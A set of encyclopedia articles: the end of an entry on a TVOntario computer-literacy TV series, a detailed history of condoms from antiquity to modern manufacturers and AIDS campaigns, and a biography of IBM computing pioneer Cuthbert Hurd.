Program 11: Computers at Work
Program 12: What Next?
Episodes (1991)
Program 1: Basics
Program 2: Words
Program 3: Numbers
Program 4: Files
Program 5: Messages
Program 6: Pictures
Crew
Original Music - Harry Forbes, George Axon
Animation Voice - Fred Napoli
Animation - Grafilm Productions Inc.
Consultants - Jim Butterfield, David Humphreys, Mike H. Stein, Jo Ann Wilton
Unit Manager - Rodger Lawson
Production Editors - Michael Kushner, Paul Spencer, Brian Elston, Doug Beavan
Production Assistant - George Pyron
Executive Producer - Mike McManus
Director - Stu Beecroft
Written & Produced by - Denise Boiteau and David Stansfield
References
External links
TVOntario's official (but incomplete) archive of the original series via the Internet Archive's Wayback Machine
Complete archive of the original series on YouTube, including episodes and standalone clips of all of the animations and interviews
Fansite with more information about the show
1983 Canadian television series debuts
1991 Canadian television series debuts
TVOntario original programming
Television shows filmed in Toronto
Computer television series
1980s Canadian children's television series
1990s Canadian children's television series
|
18053246
|
https://en.wikipedia.org/wiki/History%20of%20condoms
|
History of condoms
|
The history of condoms goes back at least several centuries, and perhaps beyond. For most of their history, condoms have been used both as a method of birth control, and as a protective measure against venereal (sexually transmitted) diseases such as syphilis, gonorrhea, chlamydia, hepatitis B and more recently HIV/AIDS. Condoms have been made from a variety of materials; prior to the 19th century, chemically treated linen and animal tissue (intestine or bladder) are the best documented varieties. Rubber condoms gained popularity in the mid-19th century, and in the early 20th century major advances were made in manufacturing techniques. Prior to the introduction of the combined oral contraceptive pill, condoms were the most popular birth control method in the Western world. In the second half of the 20th century, the low cost of condoms contributed to their importance in family planning programs throughout the developing world. Condoms have also become increasingly important in efforts to fight the AIDS pandemic. The oldest condoms ever excavated were found in a cesspit located in the grounds of Dudley Castle and were made from animal membrane. The condoms dated back to as early as 1642.
Antiquity to the Middle Ages for sex
Whether condoms were used in ancient civilizations is debated by archaeologists and historians. Societies in the ancient civilizations of Egypt, Greece, and Rome preferred small families and are known to have practiced a variety of birth control methods. However, these societies viewed birth control as a woman's responsibility, and the only well-documented contraception methods were female-controlled devices (both possibly effective, such as pessaries, and ineffective, such as amulets). The writings of these societies contain "veiled references" to male-controlled contraceptive methods that might have been condoms, but most historians interpret them as referring to coitus interruptus or anal intercourse.
The loincloths worn by Egyptian and Greek laborers were very sparse, sometimes consisting of little more than a covering for the glans of the penis. Records of these types of loincloths being worn by men in higher classes have made some historians speculate they were worn during intercourse; others, however, are doubtful of such interpretations. Historians may also cite one legend of Minos, related by Antoninus Liberalis in 150 AD, as suggestive of condom use in ancient societies. This legend describes a curse that caused Minos' semen to contain serpents and scorpions. To protect his sexual partner from these animals, Minos used a goat's bladder as a female condom.
Contraceptives fell out of use in Europe after the decline of the Western Roman Empire in the 5th century; the use of contraceptive pessaries, for example, is not documented again until the 15th century. If condoms were used during the Roman Empire, knowledge of them may have been lost during its decline. In the writings of Muslims and Jews during the Middle Ages, there are some references to attempts at male-controlled contraception, including suggestions to cover the penis in tar or soak it in onion juice. Some of these writings might describe condom use, but they are "oblique", "veiled", and "vague".
1500s to the 1800s
Renaissance
Prior to the 15th century, some use of glans condoms (devices covering only the head of the penis) is recorded in Asia. Glans condoms seem to have been used for birth control, and to have been known only by members of the upper classes. In China, glans condoms may have been made of oiled silk paper, or of lamb intestines. In Japan, they were made of tortoise shell or animal horn.
The first well-documented outbreak of what is now known as syphilis occurred in 1494 among French troops. The disease then swept across Europe. As Jared Diamond describes it, "when syphilis was first definitely recorded in Europe in 1495, its pustules often covered the body from the head to the knees, caused flesh to fall from people's faces, and led to death within a few months." (The disease is less frequently fatal today.) By 1505, the disease had spread to Asia, and within a few decades had "decimated large areas of China".
In 16th-century Italy, Gabriele Falloppio authored the earliest uncontested description of condom use. De Morbo Gallico ("The French Disease", referring to syphilis) was published in 1564, two years after Falloppio's death. In this tract, he recommended use of a device he claimed to have invented: linen sheaths soaked in a chemical solution and allowed to dry before use. The cloths he described were sized to cover the glans of the penis, and were held on with a ribbon. Fallopio claimed to have performed an experimental trial of the linen sheath on 1100 men, and reported that none of them had contracted the dreaded disease.
After the publication of De Morbo Gallico, use of penis coverings to protect from disease is described in a wide variety of literature throughout Europe. The first indication these devices were used for birth control, rather than disease prevention, is the 1605 theological publication De iustitia et iure (On justice and law) by Catholic theologian Leonardus Lessius: he condemned them as immoral. The first explicit description that un petit linge (a small cloth) was used to prevent pregnancy is from 1655: a French novel and play titled L'Escole des Filles (The Philosophy of Girls). In 1666, the English Birth Rate Commission attributed a recent downward fertility rate to use of "condons", the first documented use of that word (or any similar spelling).
In addition to linen, condoms during the Renaissance were made out of intestines and bladder. Cleaned and prepared intestine for use in glove making had been sold commercially since at least the 13th century. Condoms made from bladder and dating to the 1640s were discovered in an English privy; it is believed they were used by soldiers of King Charles I. Dutch traders introduced condoms made from "fine leather" to Japan. Unlike the horn condoms used previously, these leather condoms covered the entire penis.
18th century
Written references to condom use became much more common during the 18th century. Not all of the attention was positive: in 1708, John Campbell unsuccessfully asked Parliament to make the devices illegal. Noted English physician Daniel Turner condemned the condom, publishing his arguments against their use in 1717. He disliked condoms because they did not offer full protection against syphilis. He also seems to have argued that belief in the protection condoms offered encouraged men to engage in sex with unsafe partners - but then, because of the loss of sensation caused by condoms, these same men often neglected to actually use the devices. The French medical professor Jean Astruc wrote his own anti-condom treatise in 1736, citing Turner as the authority in this area. Physicians later in the 18th century also spoke against the condom, but not on medical grounds: rather, they expressed the belief that contraception was immoral.
The condom market grew rapidly, however. 18th-century condoms were available in a variety of qualities and sizes, made from either linen treated with chemicals, or "skin" (bladder or intestine softened by treatment with sulphur and lye). They were sold at pubs, barbershops, chemist shops, open-air markets, and at the theatre throughout Europe and Russia. The first recorded inspection of condom quality is found in the memoirs of Giacomo Casanova (which cover his life until 1774): to test for holes, he would often blow them up before use.
Couples in colonial America relied on female-controlled methods of contraception if they used contraceptives at all. The first known documents describing American condom use were written around 1800, two to three decades after the American Revolutionary War. Also around 1800, linen condoms lost popularity in the market and their production ceased: they were more expensive and were viewed as less comfortable when compared to skin condoms.
Up to the 19th century, condoms were generally used only by the middle and upper classes. Perhaps more importantly, condoms were unaffordable for many: for a typical prostitute, a single condom might cost several months' pay.
Expanded marketing and introduction of rubber
The early 19th century saw contraceptives promoted to the poorer classes for the first time: birth control advocates in England included Jeremy Bentham and Richard Carlile, and noted American advocates included Robert Dale Owen and Charles Knowlton. Writers on contraception tended to prefer other methods of birth control, citing both the expense of condoms and their unreliability (they were often riddled with holes, and often fell off or broke), but they discussed condoms as a good option for some, and as the only contraceptive that also protected from disease. One group of British contraceptive advocates distributed condom literature in poor neighborhoods, with instructions on how to make the devices at home; in the 1840s, similar tracts were distributed in both cities and rural areas through the United States.
From the 1820s through the 1870s, popular women and men lecturers traveled around America teaching about physiology and sexual matters. Many of them sold birth control devices, including condoms, after their lectures. They were condemned by many moralists and medical professionals, including America's first female doctor Elizabeth Blackwell. Blackwell accused the lecturers of spreading doctrines of "abortion and prostitution". In the 1840s, advertisements for condoms began to appear in British newspapers, and in 1861 a condom advertisement appeared in the New York Times.
The discovery of the rubber vulcanization process is disputed. Some contest that it was invented by Charles Goodyear in America 1839, and patented in 1844. Other accounts attribute it to Thomas Hancock in Britain in 1843. The first rubber condom was produced in 1855, and by the late 1850s several major rubber companies were mass-producing, among other items, rubber condoms. A main advantage of rubber condoms was their reusability, making them a more economical choice in the long term. Compared to the 19th-century rubber condoms, however, skin condoms were initially cheaper and offered better sensitivity. For these reasons, skin condoms remained more popular than the rubber variety. However, by the end of the 19th century "rubber" had become a euphemism for condoms in countries around the world. For many decades, rubber condoms were manufactured by wrapping strips of raw rubber around penis-shaped moulds, then dipping the wrapped moulds in a chemical solution to cure the rubber. The earliest rubber condoms covered only the glans of the penis; a doctor had to measure each man and order the correct size. Even with the medical fittings, however, glans condoms tended to fall off during use. Rubber manufacturers quickly discovered they could sell more devices by manufacturing full-length one-size-fits-all condoms to be sold in pharmacies.
Increased popularity despite legal impediments
Distribution of condoms in the United States was limited by passage of the Comstock laws, which included a federal act banning the mailing of contraceptive information (passed in 1873) as well as State laws that banned the manufacture and sale of condoms in thirty states. In Ireland the 1889 Indecent Advertisements Act made it illegal to advertise condoms, although their manufacture and sale remained legal. Contraceptives were illegal in 19th-century Italy and Germany, but condoms were allowed for disease prevention. In Great Britain it was forbidden to sell condoms as prophylactics under the 1917 VD act, so they were marketed as contraceptives rather than as prophylactics, as they were in America. Despite legal obstacles, condoms continued to be readily available in both Europe and America, widely advertised under euphemisms such as male shield and rubber good. In late-19th-century England, condoms were known as "a little something for the weekend". The phrase was commonly used in barbershops, which were a key retailer of condoms, in twentieth century Britain. Only in the Republic of Ireland were condoms effectively outlawed. In Ireland their sale and manufacture remained illegal until the 1970s.
Opposition to condoms did not only come from moralists: by the late 19th century many feminists expressed distrust of the condom as a contraceptive, as its use was controlled and decided upon by men alone. They advocated instead for methods which were controlled by women, such as diaphragms and spermicidal douches. Despite social and legal opposition, at the end of the 19th century the condom was the Western world's most popular birth control method. Two surveys conducted in New York in 1890 and 1900 found that 45% of the women surveyed were using condoms to prevent pregnancy. A survey in Boston just prior to World War I concluded that three million condoms were sold in that city every year.
1870s England saw the founding of the first major condom manufacturing company, E. Lambert and Son of Dalston. In 1882, German immigrant Julius Schmidt founded one of the largest and longest-lasting condom businesses, Julius Schmid, Inc. (he dropped the 't' from his name in an effort to appear less Jewish). This New York business initially manufactured only skin condoms (in 1890 he was arrested by Anthony Comstock for having almost seven hundred of the devices in his house). In 1912, a German named Julius Fromm developed a new, improved manufacturing technique for condoms: dipping glass molds into a raw rubber solution. Called cement dipping, this method required adding gasoline or benzene to the rubber to make it liquid. In America, Schmid was the first company to use the new technique. Using the new dipping method, French condom manufacturers were the first to add textures to condoms. Fromm was the first company to sell a branded line of condoms, Fromm's Act, which remains popular in Germany today. The Fromms was taken over by the Nazis during the war, and the family fled to Great Britain but could not compete against the powerful London Rubber Company. The condom lines manufactured by Schmid, Sheiks and Ramses, were sold through the late 1990s. Youngs Rubber Company, founded by Merle Youngs in late-19th-century America, introduced Trojans.
Beginning in the second half of the 19th century, American rates of sexually transmitted diseases skyrocketed. Causes cited by historians include effects of the American Civil War, and the ignorance of prevention methods promoted by the Comstock laws. To fight the growing epidemic, sexual education classes were introduced to public schools for the first time, teaching about venereal diseases and how they were transmitted. They generally taught that abstinence was the only way to avoid sexually transmitted diseases. The medical community and moral watchdogs considered STDs to be punishment for sexual misbehavior. The stigma on victims of these diseases was so great that many hospitals refused to treat people who had syphilis.
1900 to present
World War I to the 1920s
The German military was the first to promote condom use among its soldiers, beginning in the second half of the 19th century. Early-20th-century experiments by the American military concluded that providing condoms to soldiers significantly lowered rates of sexually transmitted diseases. During World War I, the United States and (at the beginning of the war only) Britain were the only countries with soldiers in Europe who did not provide condoms and promote their use, although some condoms were provided as an experiment by the British Navy. By the end of the war, the American military had diagnosed almost 400,000 cases of syphilis and gonorrhea, a historic high.
From just before 1900 to the beginning of World War I, almost all condoms used in Europe were imported from Germany. Germany not only exported condoms to other European countries, but was a major supplier to Australia, New Zealand, and Canada. During the war, the American companies Schmid and Youngs became the main suppliers of condoms to the European Allies. By the early 1920s, however, most of Europe's condoms were once again made in Germany.
In 1918, just before the end of the war, an American court overturned a conviction against Margaret Sanger. In this case, the judge ruled that condoms could be legally advertised and sold for the prevention of disease. There were still a few state laws against buying and selling contraceptives, and advertising condoms as birth control devices remained illegal in over thirty states. But condoms began to be publicly, legally sold to Americans for the first time in forty-five years. Through the 1920s, catchy names and slick packaging became an increasingly important marketing technique for many consumer items, including condoms and cigarettes. Quality testing became more common, involving filling each condom with air followed by one of several methods intended to detect loss of pressure. Several American companies sold their rejects under cheaper brand names rather than discarding them. Consumers were advised to perform similar tests themselves before use, although few actually did so. Worldwide, condom sales doubled in the 1920s.
Still, there were many prominent opponents of condoms. Marie Stopes objected to the use of condoms ostensibly for medical reasons. Founder of psychoanalysis Sigmund Freud opposed all methods of birth control on the grounds that their failure rates were too high. Freud was especially opposed to the condom because it cut down on sexual pleasure. . Some feminists continued to oppose male-controlled contraceptives such as condoms. Many moralists and medical professionals opposed all methods of contraception. In 1920 the Church of England's Lambeth Conference condemned all "unnatural means of conception avoidance." London's Bishop Arthur Winnington-Ingram complained of the number of condoms discarded in alleyways and parks, especially after weekends and holidays.
In the U.S., condom advertising was legally restricted to their use as disease preventatives. They could be openly marketed as birth control devices in Britain, but purchasing condoms in Britain was socially awkward compared to the U.S. They were generally requested with the euphemism "a little something for the weekend." Boots, the largest pharmacy chain in Britain, stopped selling condoms altogether in the 1920s, a policy that was not reversed until the 1960s. In post-World War I France, the government was concerned about falling birth rates. In response, it outlawed all contraceptives, including condoms. Contraception was also illegal in Spain. European militaries continued to provide condoms to their members for disease protection, even in countries where they were illegal for the general population.
Invention of latex and manufacturing automation
Latex, rubber suspended in water, was invented in 1920. Youngs Rubber Company was the first to manufacture a latex condom, an improved version of their Trojan brand. Latex condoms required less labor to produce than cement-dipped rubber condoms, which had to be smoothed by rubbing and trimming. Because it used water to suspend the rubber instead of gasoline and benzene, it eliminated the fire hazard previously associated with all condom factories. Latex condoms also performed better for the consumer: they were stronger and thinner than rubber condoms, and had a shelf life of five years (compared to three months for rubber). Europe's first latex condom was an export from Youngs Rubber Company in 1929. In 1932 the London Rubber Company, which had previously served as a wholesaler for German-manufactured condoms, became Europe's first manufacturer of latex condoms, the Durex. The Durex plant was designed and installed by Lucian Landau, a Polish rubber technology student living in London.
Until the twenties, all condoms were individually hand-dipped by semiskilled workers. Throughout the decade of the 1920s, advances in automation of condom assembly line were made. Fred Killian patented the first fully automated line in 1930 and installed it in his manufacturing plant in Akron, Ohio. Killian charged $20,000 for his conveyor system - as much as $2 million in today's dollars. Automated lines dramatically lowered the price of condoms. Major condom manufacturers bought or leased conveyor systems, and small manufacturers were driven out of business. The skin condom, now significantly more expensive than the latex variety, became restricted to a niche high-end market. In Britain, the London Rubber Company's fully automated plant was designed in-house by Lucian Landau and the first lines were installed from 1950 onward.
Great Depression
In 1927, senior medical officers in the American military began promoting condom distribution and educational programs to members of the army and navy. By 1931, condoms were standard issue to all members of the U.S. military. This coincided with a steep decline in U.S. military cases of sexually transmitted disease. The U.S. military was not the only large organization that changed its moral stance on condoms: in 1930 the Anglican Church's Lambeth Conference sanctioned the use of birth control by married couples. In 1931 the Federal Council of Churches in the U.S. issued a similar statement.
The Roman Catholic Church responded by issuing the encyclical Casti connubii affirming its opposition to all contraceptives, a stance it has never reversed. Semen analysis was first performed in the 1930s. Samples were typically collected by masturbation, another action opposed by the Catholic Church. In 1930s Spain, the first use of collection condoms was documented; holes put in the condom allowed the user to collect a sample without violating the prohibitions on contraception and masturbation.
In 1932, Margaret Sanger arranged for a shipment of diaphragms to be mailed from Japan to a sympathetic doctor in New York City. When U.S. customs confiscated the package as illegal contraceptive devices, Sanger helped file a lawsuit. In 1936, a federal appeals court ruled in United States v. One Package of Japanese Pessaries that the federal government could not interfere with doctors providing contraception to their patients. In 1938, over three hundred birth control clinics opened in America, supplying reproductive care (including condoms) to poor women all over the country. Programs led by U.S. Surgeon General Thoman Parran included heavy promotion of condoms. These programs are credited with a steep drop in the U.S. STD rate by 1940.
Two of the few places where condoms became more restricted during this period were Fascist Italy and Nazi Germany. Because of government concern about low birth rates, contraceptives were made illegal in Italy in the late 1920s. Although limited and highly controlled sales as disease preventatives were still allowed, there was a brisk black market trade in condoms as birth control. In Germany, laws passed in 1933 mandated that condoms could only be sold in plain brown wrappers, and only at pharmacies. Despite these restrictions, when World War II began Germans were using 72 million condoms every year. The elimination of moral and legal barriers, and the introduction of condom programs by the U.S. government helped condom sales. However, these factors alone are not considered to explain the Great Depression's booming condom industry. In the U.S. alone, more than 1.5 million condoms were used every day during the Depression, at a cost of over $33 million per year (not adjusted for inflation). One historian explains these statistics this way: "Condoms were cheaper than children." During the Depression condom lines by Schmid gained in popularity: that company still used the cement-dipping method of manufacture. Unlike the latex variety, these condoms could be safely used with oil-based lubricants. And while less comfortable, older-style rubber condoms could be reused and so were more economical, a valued feature in hard times.
More attention was brought to quality issues in the 1930s. In 1935, a biochemist tested 2000 condoms by filling each one with air and then water: he found that 60% of them leaked. The condom industry estimated that only 25% of condoms were tested for quality before packaging. The media attention led the U.S. Food and Drug Administration to classify condoms as a drug in 1937 and mandate that every condom be tested before packaging. Youngs Rubber Company was the first to institute quality testing of every condom they made, installing automatic testing equipment designed by Arthur Youngs (the owner's brother) in 1938. The Federal Food, Drug, and Cosmetic Act authorized the FDA to seize defective products; the first month the Act took effect in 1940, the FDA seized 864,000 condoms. While these actions improved the quality of condoms in the United States, American condom manufacturers continued to export their rejects for sale in foreign markets.
World War II to 1980
During World War II condoms were not only distributed to male U.S. military members, but enlisted men were also subject to significant contraception propaganda in the form of films, posters, and lectures. A number of slogans were coined by the military, with one film exhorting "Don't forget — put it on before you put it in." African-American soldiers, who served in segregated units, were exposed to less of the condom promotion programs, had lower rates of condom usage, and much higher rates of STDs. America's female military units, the WACs and WAACs, were still engaged with abstinence programs. European and Asian militaries on both sides of the conflict also provided condoms to their troops throughout the war, even Germany which outlawed all civilian use of condoms in 1941. Despite the rubber shortages that occurred during this period, condom manufacturing was never restricted. In part because condoms were readily available, soldiers found a number of non-sexual uses for the devices, many of which continue to be utilized to this day.
Post-war American troops in Germany continued to receive condoms and materials promoting their use. Nevertheless, rates of STDs in this population began to rise, reaching the highest levels since World War I. One explanation is that the success of newer penicillin treatments led soldiers to take syphilis and gonorrhea much less seriously. A similar casual attitude toward STDs appeared in the general American population; one historian states that condoms "were almost obsolete as prophylaxis by 1960". By 1947, the U.S. military was again promoting abstinence as the only method of disease control for its members, a policy that continued through the Vietnam War.
But condom sales continued to grow. From 1955 to 1965, 42% of Americans of reproductive age relied on condoms for birth control. In Britain from 1950 to 1960, 60% of married couples used condoms. For the more economical-minded, cement-dipped condoms continued to be available long after the war. In 1957, Durex introduced the world's first lubricated condom. Beginning in the 1960s, the Japanese used more condoms per capita than any other nation in the world. The birth control pill became the world's most popular method of birth control in the years after its 1960 debut, but condoms remained a strong second. A survey of British women between 1966 and 1970 found that the condom was the most popular birth control method with single women. New manufacturers appeared in the Soviet Union, which had never restricted condom sales. The U.S. Agency for International Development pushed condom use in developing countries to help solve the "world population crises": by 1970 hundreds of millions of condoms were being used each year in India alone.
In the 1960s and 1970s quality regulations tightened, and legal barriers to condom use were removed. In 1965, the U.S. Supreme Court case Griswold v. Connecticut struck down one of the remaining Comstock laws, the bans of contraception in Connecticut and Massachusetts. France repealed its anti-birth control laws in 1967. Similar laws in Italy were declared unconstitutional in 1971. Captain Beate Uhse in Germany founded a birth control business, and fought a series of legal battles continue her sales. In Ireland, legal condom sales (only to people over 18, and only in clinics and pharmacies) were allowed for the first time in 1978. (All restrictions on Irish condom sales were lifted in 1993.)
Advertising was one area that continued to have legal restrictions. In the late 1950s, the American National Association of Broadcasters banned condom advertisements from national television. This policy remained in place until 1979, when the U.S. Justice department had it overturned in court. In the U.S., advertisements for condoms were mostly limited to men's magazines such as Penthouse. The first television ad, on the California station KNTV, aired in 1975: it was quickly pulled after it attracted national attention. And in over 30 states, advertising condoms as birth control devices was still illegal.
After the discovery of AIDS
The first New York Times story on acquired immunodeficiency syndrome (AIDS) was published on July 3, 1981. In 1982 it was first suggested that the disease was sexually transmitted. In response to these findings, and to fight the spread of AIDS, the U.S. Surgeon General Dr. C. Everett Koop supported condom promotion programs. However, President Ronald Reagan preferred an approach of concentrating only on abstinence programs. Some opponents of condom programs stated that AIDS was a disease of homosexuals and illicit drug users, who were just getting what they deserved. In 1990, North Carolina senator Jesse Helms argued that the best way to fight AIDS would be to enforce state sodomy laws.
Nevertheless, major advertising campaigns were put in print media, promoting condoms as a way to protect against AIDS. Youngs Rubber mailed educational pamphlets to American households, although the postal service forced them to go to court to do so, citing a section of Title 39 that "prohibits the mailing of unsolicited advertisements for contraceptives." In 1983 the U.S. Supreme Court held that the postal service's actions violated the free speech clause of the First Amendment. Beginning in 1985 through 1987, national condom promotion campaigns occurred in U.S. and Europe. Over the 10 years of the Swiss campaign, Swiss condom use increased by 80%. The year after the British campaign began, condom sales in the UK increased by 20%. In 1988 Britain, condoms were the most popular birth control choice for married couples, for the first time since the introduction of the pill. The first condom commercial on U.S. television aired during an episode of Herman's Head on November 17, 1991. In the U.S. in the 1990s, condoms ranked third in popularity among married couples, and were a strong second among single women.
Condoms began to be sold in a wider variety of retail outlets, including in supermarkets and in discount department stores such as Wal-Mart. In this environment of more open sales, the British euphemism of "a little something for the weekend" fell out of use. In June 1991 America's first condom store, Condomania, opened on Bleecker Street in New York City. Condomania was the first store of its kind in North America dedicated to the sale and promotion of condoms in an upbeat, upscale and fun atmosphere. Condomania was also one of the first retailers to offer condoms online when it launched its website in December 1995.
Condom sales increased every year until 1994, when media attention to the AIDS pandemic began to decline. In response, manufacturers have changed the tone of their advertisements from scary to humorous. New developments continue to occur in the condom market, with the first polyurethane condom—branded Avanti and produced by the manufacturer of Durex—introduced in the 1990s. Durex was also the first condom brand to have a website, launched in 1997. Worldwide condom use is expected to continue to grow: one study predicted that developing nations would need 18.6 billion condoms in 2015.
Etymology and other terms
Etymological theories for the word "condom" abound. By the early 18th century, the invention and naming of the condom was attributed to an associate of England's King Charles II, and this explanation persisted for several centuries. However, the "Dr. Condom" or "Earl of Condom" described in these stories has never been proved to exist, and condoms had been used for over one hundred years before King Charles II acceded to the throne.
A variety of Latin etymologies have been proposed, including condon (receptacle), (house), and (scabbard or case). It has also been speculated to be from the Italian word , derived from , meaning glove. William E. Kruck wrote an article in 1981 concluding that, "As for the word 'condom', I need state only that its origin remains completely unknown, and there ends this search for an etymology." Modern dictionaries may also list the etymology as "unknown".
Other terms are also commonly used to describe condoms. In North America condoms are also commonly known as prophylactics, or rubbers. In Britain they may be called French letters. Additionally, condoms may be referred to using the manufacturer's name. The insult term scumbag was originally a slang word for condom.
Major manufacturers
One analyst described the size of the condom market as something that "boggles the mind". Numerous small manufacturers, nonprofit groups, and government-run manufacturing plants exist around the world. Within the condom market, there are several major contributors, among them both for-profit businesses and philanthropic organizations.
In 1882, German immigrant Julius Schmidt founded one of the largest and longest-lasting condom businesses, Julius Schmid, Inc., based in New York City. The condom lines manufactured by Schmid included Sheiks and Ramses. In 1932, the London Rubber Company (which had previously been a wholesale business importing German condoms) began to produce latex condoms, under the Durex brand. In 1962 Schmid was purchased by London Rubber. In 1987, London Rubber began acquiring other condom manufacturers, and within a few years became an important international company. In the late 1990s, London Rubber (by then London International Limited) merged all the Schmid brands into its European brand, Durex. Soon after, London International was purchased by Seton Scholl Healthcare (manufacturer of Dr. Scholl's footcare products), forming Seton Scholl Limited.
Youngs Rubber Company, founded by Merle Youngs in late-19th-century America, introduced the Trojan line of condoms. In 1985, Youngs Rubber Company was sold to Carter-Wallace. The Trojan name switched hands yet again in 2000 when Carter-Wallace was sold to Church and Dwight.
The Australian division of Dunlop Rubber began manufacturing condoms in the 1890s. In 1905, Dunlop sold its condom-making equipment to one of its employees, Eric Ansell, who founded Ansell Rubber. In 1969, Ansell was sold back to Dunlop. In 1987, English business magnate Richard Branson contracted with Ansell to help in a campaign against HIV and AIDS. Ansell agreed to manufacture the Mates brand of condom, to be sold at little or no profit in order to encourage condom use. Branson soon sold the Mates brand to Ansell, with royalty payments made annually to the charity Virgin Unite. In addition to its Mates brand, Ansell currently manufactures Lifestyles and Lifesan for the U.S. market.
In 1934 the Kokusia Rubber Company was founded in Japan. It is now known as the Okamoto Rubber Manufacturing Company.
In 1970 Tim Black and Philip Harvey founded Population Planning Associates (now known as Adam & Eve). Population Planning Associates was a mail-order business that marketed condoms to American college students, despite U.S. laws against sending contraceptives through the mail. Black and Harvey used the profits from their company to start a non-profit organization Population Services International. By 1975, PSI was marketing condoms in Kenya and Bangladesh, and today operates programs in over sixty countries. Harvey left his position as PSI's director in the late 1970s, but in the late 1980s again founded a nonprofit company, DKT International. Named after D.K. Tyagi (a leader of family planning programs in India), DKT International annually sells millions of condoms at discounted rates in developing countries around the world. By selling the condoms instead of giving them away, DKT intends to make its customers invested in using the devices. One of DKT's more notable programs is its work in Ethiopia, where soldiers are required to carry a condom every time they leave base. The rate of HIV infection in the Ethiopian military, about 5%, is believed to be the lowest among African militaries.
In 1987, Tufts University students Davin Wedel and Adam Glickman started Global Protection Corp. in response to C. Everett Koop's statement that "a condoms can save your life." Since that time, Global Protection Corp. has become known for its innovative approach to condom marketing and its support of more than 3500 non-profit organizations worldwide. The company has numerous patents and trademarks to its name, including the only FDA-approved glow-in-the-dark condom, the Pleasure Plus condom and the original condom keychain. In 2005 the company introduced its newest product, One Condoms. One represents a complete reinvention of retail condom brands, combining sleek metal packaging, innovative condom wrappers and innovative marketing programs. In South Africa, some manufacturers have considered introducing an extra-large variety of condoms after several complaints from South African men claiming the condoms were too small and causing discomfort.
References
Condoms
Condoms
Condoms
|
16949704
|
https://en.wikipedia.org/wiki/Cuthbert%20Hurd
|
Cuthbert Hurd
|
Cuthbert Corwin Hurd (April 5, 1911 – May 22, 1996) was an American computer scientist and entrepreneur, who was instrumental in helping the International Business Machines Corporation develop its first general-purpose computers.
Life
Hurd was born April 5, 1911, in Estherville, Iowa. He received his B.A. in mathematics from Drake University in 1932, his M.S. in mathematics from Iowa State College in 1934, and his Ph.D. in mathematics from the University of Illinois in 1936. Waldemar Joseph Trjitzinsky was his advisor, and dissertation was Asymptotic theory of linear differential equations singular in the variable of differentiation and in a parameter.
He did post-doctorate work at Columbia University and the Massachusetts Institute of Technology (MIT).
He was assistant professor at Michigan State University from 1936 to 1942.
During World War II Hurd taught at the US Coast Guard Academy with the rank of Lieutenant Commander, and co-authored the textbook for teaching Mathematics to mariners. From 1945 to 1947 he was dean of Allegheny College.
In 1947 he moved to Oak Ridge, Tennessee, where he worked for Union Carbide as mathematician at the United States Atomic Energy Commission facility Oak Ridge National Laboratory. He taught and later served as a technical research head under Alston Scott Householder. At Oak Ridge he supervised the installation of an IBM 602 calculating punched card machine to automate the tracking of material in the facility, and saw the potential for automating the massive amounts of computation needed for nuclear Physics research. In February 1948 he was invited to the dedication of the IBM Selective Sequence Electronic Calculator (SSEC), a custom-built machine in New York City. He asked if the SSEC could be used for calculations being done at Oak Ridge for the NEPA project to power an airplane with a nuclear reactor, but the demands for the SSEC produced a backlog. In the meanwhile, he requested that the first IBM 604 calculating card punch be delivered to Oak Ridge. It was, but the calculations remained slow with the limited electronics in the 604.
IBM
From 1949 to 1962, he worked at IBM, where he founded the Applied Science Department and pushed reluctant management into the world of computing.
Hurd hired John von Neumann as a consultant. The eccentric genius was known for his fast driving, and IBM often would pay von Neumann's traffic fines. They developed a personal friendship, with Hurd visiting von Neumann in Walter Reed Army Medical Center as he was dying of cancer.
At the time, IBM calculators were programmed by plugging and unplugging wires manually into large panels. The concept of storing the program as well as data in computer memory was generally called the Von Neumann architecture (although others developed the concept about the same time).
IBM had built the experimental stored-program SSEC, but company president Thomas J. Watson favored basing commercial products on punched card technology with manual programming. Hurd hired a team who would be the first professional computer software writers, such as John Backus and Fred Brooks.
The first step was to offer a calculator that could be programmed on punch cards in addition to a manual plugboard. This was the Card-Programmed Electronic Calculator, announced in May 1949. It was essentially a commercialized version of experiments done by Wallace John Eckert and customers at Northrop Corporation, but became a very popular product, shipping several thousand units in various models.
Based on this demand, Hurd advised new company president Tom Watson, Jr. to build the first IBM commercial stored program computer, first called the Defense Calculator. It was marketed as the IBM 701 in 1952.
There were 18 model 701 machines built (in addition to the Engineering development machine).
In 1953 Hurd convinced IBM management to develop what became the IBM 650 Magnetic Drum Data Processing Machine.
Although the UNIVAC I (and Ferranti Mark 1 in England) had been introduced earlier than any IBM computer, its high price (while IBM offered monthly leases) limited sales. The lower expense of the 650 meant it could be purchased in much larger quantities. Almost 2000 were produced between 1953 and 1962, to commercial customers as well as academics.
On January 19, 1955, Hurd became director of the IBM Electronic Data Processing Machines Division when T. Vincent Learson was promoted to Vice President of Sales. In 1955, Hurd made a proposal to Edward Teller for a computer to be used at the Lawrence Livermore Laboratory. This would evolve into the IBM "Stretch" project. The ambitious promises made for the performance of the machine were not met when it was finally delivered in 1961 as the model 7030, although techniques developed and lessons learned in its design were used on other IBM products.
California
After 1962, he served as chairman of the Computer Usage Company, the first independent computer software company, and president from 1970 through 1974.
He then consulted for various firms in Silicon Valley, and served as an expert witness in the IBM antitrust cases. From 1978 to 1986, Hurd served as chairman for Picodyne Corporation, which he co-founded with H. Dean Brown.
Hurd was a founder of Quintus Computer Systems in 1983 with William Kornfeld, Lawrence Byrd, Fernando Pereira and David H. D. Warren to commercialize a Prolog compiler.
Hurd was president and chairman until Quintus was sold to Intergraph Corporation in October 1989.
In 1967. Drake University awarded Hurd an honorary LLD degree.
In 1986 he received the IEEE Computer Pioneer award by the IEEE Computer Society for his contributions to early computing.
In his later life he lived in Portola Valley, California, became an avid gardener and studied native California plants. A variety of Arctostaphylos manzanita is named Dr. Hurd for him. He died there May 22, 1996.
He endowed scholarships in Mathematics and Computer Science at Stanford University.
Publications
1943, Mathematics for Mariners with Chester E. Dimick. New York: D Van Nostrand Company Inc, 1943.
1950, "The IBM Card-Programmed Electronic Calculator" in: Proceedings, Seminar on Scientific Computation November, 1949, IBM, p. 37-41.
1955, "Mechanical Translation: New Challenge to Communication Ornstein", in: Science 21 October 1955: pp. 745–748.
1983. Special Issue: The IBM 701 Thirtieth Anniversary - IBM Enters the Computing Field, Annals of the History of Computing, Vol. 5 (No. 2), 1983
1985, "A note on early Monte Carlo computations and scientific meetings", in: IEEE Annals of the History of Computing archive, Volume 7, Issue 2 (April 1985) pp 141–155.
1986, "Prologue," IEEE Annals of the History of Computing, vol. 8, no. 1, pp. 6–7, Jan-Mar, 1986
See also
